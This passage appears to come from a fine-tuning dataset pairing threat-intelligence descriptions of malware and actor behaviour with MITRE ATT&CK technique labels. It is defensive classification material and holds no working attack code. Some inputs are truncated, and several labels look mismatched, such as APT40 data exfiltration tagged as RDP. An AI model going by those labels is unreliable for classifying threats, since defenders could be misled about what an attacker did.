"user", "content": "The initial beacon packet for Misdat contains the operating system version of the victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can capture the victim's screen." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used a tool to query the Registry for proxy settings." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "See the following for more information and examples of false flags being used in cyberattacks: Wave your false flags! …or the Nightmares and Nuances of a Self-Aware Attribution Space OlympicDestroyer is here to trick the industry Malware description The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox has gained execution through user interaction with a malicious file." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "itwm= ags= oe= aq= btnG= oprnd= itwm= utm= channel= The XAgent OSX Trojan generates a system specific value that it refers to as an “agent_id”, which is a unique identifier for each compromised host" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malware uses xor key [0x09, 0xff, 0x20] to decrypt content in .data section and get string “aHR0cDovLzUxLjE1LjE5Ni4zMC8xL2luZGV4LnBocA”. Then malware does base64 decoding to get the C2 address" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can send stolen information to C2 nodes including passwords, accounts, and emails." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An older variant of performs UAC bypass." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1027 - Obfuscated Files or Information', 'T1204.002 - User Execution: Malicious File', 'T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seth-Locker can execute commands via the command line shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore can perform keylogging on the victim’s machine." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exploitation of this vulnerability allows an attacker to escalate privileges on the affected system" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors' proxy implementation \"Agent\" upgraded the socket in use to a TLS socket." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SeaDuke is capable of executing commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses ZPP, a .NET console program, to compress files with ZIP." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to retrieve information about the OS." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to escalate privileges by bypassing User Access Control." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember." }, { "role": "assistant", "content": "T1213.002 - Sharepoint" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has used rundll32.exe to execute other DLLs and named pipes." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy." }, { "role": "assistant", "content": "T1542.003 - Bootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Despite this indictment and other disclosures of COBALT DICKENS campaigns, the threat group (also known as Silent Librarian) shows no signs of stopping its activity as of this publication. CTU™ researchers have observed the threat actors using free online services as part of their operations, including free certificates, domains, and publicly available tools" }, { "role": "assistant", "content": "T1608.005 - Link Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cadelspy has the ability to record audio from the compromised host." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet used WMI with an \"explorer.exe\" token to execute on a remote share." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang performs operating system information discovery using \"systeminfo\" and has used implants to identify the system language and computer name." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used a SharePoint enumeration and data dumping tool known as spwebmember." }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can collect data and files from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Establish persistence via the Startup folder or theRun registry key (some variants). 2) Inject itself to another process such as rundll32.exe and dllhost.exe (some variants). 3) Decrypt two blobs: Import Table and the loader configuration" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Duqu command and control protocol's data stream can be encrypted with AES-CBC." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RobbinHood stops 181 Windows services on the system before beginning the encryption process." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used batch scripting to automate execution of commands." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges.  The service is configured with a name, description, and display name that is provided within the configuration" }, { "role": "assistant", "content": "T1007 - System Service Discovery', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a keylogger to capture keystrokes and location of where the user is typing." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim’s machine." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSInfo performs a connection test to discover remote systems in the network" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download additional encrypted backdoors onto the victim via GIF files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains an implementation of PsExec for remote execution." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft" }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Evilnum has used malicious JavaScript files on the victim's machine." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT has used DNS to communicate with the C2." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, the script executes a command to delete the targeted PC’s volume shadow copies, so victims cannot restore older unencrypted versions of their files" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos searches for Sandboxie and VMware on the system." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Transparent Tribe has compromised domains for use in targeted malicious campaigns." }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used RDP to access targeted systems." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Most Sakula samples maintain persistence by setting the Registry Run key \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\" in the HKLM or HKCU hive, with the Registry value and file name varying by sample." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. DGet — This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. Source: Secureworks) - Screen Capture Tool— This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use downloaders or other malware to send the new list to a compromised host. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore’s plugins were obfuscated with Eazfuscater.NET 3.3." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "That persistence is achieved by adding a new task in the task scheduler – it deploys the malicious sample after every minute, to ensure that it keeps running" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Spark has been packed with Enigma Protector to obfuscate its contents." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These Honeybee documents did not contain any specific lures, rather variations of a “not compatible” message attempting to convince the user to enable content" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 leveraged privileged accounts to replicate directory service data with domain controllers." }, { "role": "assistant", "content": "T1003.006 - OS Credential Dumping: DCSync" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Azorult can recursively search for files in folders and collects files from the desktop with certain extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoxCaon has searched for files on the system, such as documents located in the desktop folder." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 7: Dropbox-themed landing page with a lure asking users to click a button that links to the malicious document" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has compressed data into password-protected RAR archives prior to exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AutoIt backdoor has sent a C2 response that was base64-encoded." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taken together, the VirusTotal submissions of the samples, the samples themselves, the ZIP containing the samples (observed as a dissemination mechanism via email attachment), as well as the RAR container (seen later in this report under the Analysis section) form a timeline beginning on 12 November" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan’s capabilities. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HighShell v5.0 explorer tab allows actor to navigate the file system The HighShell v7.1 variant from the data dump contains similar functionality to its predecessors and continued the tabular approach but expanded even further by splitting out the main functionality across multiple tabs, specifically “Command”, “Explorer”, “Upload”, “Download”, “Sql Server” and “Change Time”" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"net user username \\password \\domain\" commands in Net can be used to create a domain account." }, { "role": "assistant", "content": "T1136.002 - Create Account: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors used HTTP GET requests for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Win32/Diskcoder.D has the ability to spread via SMB. First, it scans internal networks for open SMB shares. It looks for the following shares" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The software installed on the compromised computer is of particular interest. Which programs are installed on the system. Which of them are executed automatically at each system start or user logon. Which programs are used by a particular user. If the attackers are interested, they are only one command away from these valuable data" }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon uses TCP and UDP for C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore has been spread through malicious advertisements on websites." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In Figure 4, the first DNS query to resolve is. . yFIOr645245444143544544.windows64x[.]com which acts as an initial beacon. The first five characters (yFIOr) are random and have no purpose other than generating random subdomains in order to avoid DNS caching. The next two characters (64) signify the Hex notation of the d request type, which is the request type for the initial beacon as noted in Table 3. The request type is followed by the system specific hostname hardcoded into the sample, which in this case is 5245444143544544 for ." }, { "role": "assistant", "content": "T1583.002 - DNS Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware has used HTTP and IRC for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors mapped network drives using 'net use' and administrator credentials." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hello, I got kinsing on my main development box (ubuntu 20 lamp stack). NO docker NO redis NO phpunit How it got in, is a mystery. All I can tell is it came in via apache (kinsing was running as www-data and main kinsing executable in /tmp was owned by www-data). I am using Laravel 7.2.0 not sure are there any loop in the laravel" }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Revenge RAT creates a Registry key at \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" to survive a system reboot." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel uses HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product." }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has encrypted an ELF file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence attempts to get users to launch malicious attachments delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": 